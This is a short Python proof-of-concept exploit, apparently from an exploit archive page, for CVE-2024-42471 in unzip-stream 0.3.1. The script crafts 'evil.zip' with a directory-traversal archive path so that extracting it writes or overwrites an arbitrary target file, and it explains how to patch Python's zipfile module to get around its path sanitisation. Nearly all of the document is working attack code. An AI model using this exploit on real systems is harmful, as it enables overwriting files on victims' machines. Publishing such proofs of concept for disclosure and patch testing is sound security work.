32 lines
No EOL
1.2 KiB
Python
Executable file
32 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: unzip-stream 0.3.1 - Arbitrary File Write
|
|
# Date: 18th April, 2024
|
|
# Exploit Author: Ardayfio Samuel Nii Aryee
|
|
# Software link: https://github.com/mhr3/unzip-stream
|
|
# Version: unzip-stream 0.3.1
|
|
# Tested on: Ubuntu
|
|
# CVE: CVE-2024-42471
|
|
|
|
|
|
|
|
# NB: Python's built-in `zipfile` module has limitations on the `arcname` parameter.
|
|
# To bypass this restriction, edit the module's source code (`zipfile.py`) and comment out the following line:
|
|
# arcname = os.path.normpath(os.path.splitdrive(arcname)[1])
|
|
# For a more detailed explanation, feel free to check out my blog post here: https://themcsam.github.io/posts/unzip-stream-PoC/
|
|
|
|
|
|
import zipfile
|
|
import os
|
|
import sys
|
|
|
|
file_path = './poc' # Change to the file which contains the data to write
|
|
zip_name = 'evil.zip'
|
|
path_to_overwrite_file = 'home/mcsam/pocc' # Change to target file to write/overwrite
|
|
|
|
if not os.path.isfile(file_path):
|
|
print(f"Error: File '{file_path}' does not exist.")
|
|
sys.exit()
|
|
|
|
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
|
|
zipf.write(file_path, \
|
|
arcname=f'hack/../../../../../../../../../../../../../../{path_to_overwrite_file}')
|
|
print(f"File '{file_path}' has been zipped as '{zip_name}'.") |